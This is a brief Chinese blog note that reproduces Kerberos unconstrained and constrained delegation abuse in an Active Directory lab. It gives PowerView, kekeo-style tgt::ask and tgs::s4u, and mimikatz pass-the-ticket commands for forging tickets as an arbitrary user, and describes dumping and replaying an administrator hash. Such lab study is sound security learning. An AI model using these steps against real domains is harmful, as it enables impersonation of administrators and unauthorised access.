委派与约束委派复现

• 2020 年 12 月 2 日
• 笔记

委派与约束委派实际利用实战

域控机 windows2016

域成员主机 windows2012

非约束委派账号 yzc

非约束委派

User>service1(直接发送tgt，则service1可以用这个tgt去访问任何user允许访问的服务)

实验准备

1. 设置yzc为服务账号

Setspn –U –A https/golden yzc

2. 设置账号为非约束委派

3. 查找非约束委派账号

当ps脚本禁止加载时修改配置即可

Powerview Get-Netuser -Unconstrained -Domain yzc.com | select name

4.域控机器模拟登陆winrm Enter-PSSession -ComputerName WIN

 5.域成员主机导出hash，发现administrator  hash

 6.导入hash 访问域控

约束委派复现（发送请求时，由服务代表user向KDC请求票据）

协议S4U2Self S4U2proxy。

在约束委派的情况下，服务用户只能获取某个用户的的服务st，访问特定的服务。当获取了服务用户的密码明文或者NTMLhash，则可以伪装成服务用户以任意用户权限访问s某服务的st。

用户-》服务1-》服务2 （当用户委派了服务1访问服务2，服务1以任意用户的名义申请访问服务2（这里可以用administrator）

环境配置：

两台域主机

Win2012-1 

Win2012-2  y用户登录 ，设置y用户对此主机有约束委派关系，服务为cifs。

域控

Win2016

复现过程：

1.获取服务用户y的TGT（已知明文密码或者ntml）这里用户为y ,发现当前目录生成了kirbi文件

tgt:ask /user:y /domain:yzc.com /password:XXX

2.根据S4u伪造票据

Tgs::s4u /tgt:(步骤一中生成的y用户的tgt票据) /user:(要伪造的用户) /service:（服务）

 3.将伪造的票据利用mimikatz导入

Kerberos::ptt 票据

 4.访问win2012-2主机的C盘，发现成功